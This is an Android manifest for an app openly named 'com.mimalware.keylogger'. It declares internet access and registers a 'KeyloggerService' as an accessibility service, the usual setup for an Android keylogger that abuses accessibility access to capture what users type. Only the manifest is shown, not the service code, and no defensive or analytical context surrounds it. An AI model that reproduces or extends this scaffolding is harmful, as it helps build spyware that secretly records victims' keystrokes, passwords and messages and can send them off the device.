<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.mimalware.keylogger">
    
    <uses-permission android:name="android.permission.INTERNET" />

    <application android:label="@string/app_name">
        <service android:name=".KeyloggerService"
            android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE"
            android:exported="true">
            <intent-filter>
                <action android:name="android.accessibilityservice.AccessibilityService" />
            </intent-filter>
            <meta-data
                android:name="android.accessibilityservice"
                android:resource="@xml/accessibility_config" />
        </service>
    </application>
</manifest>
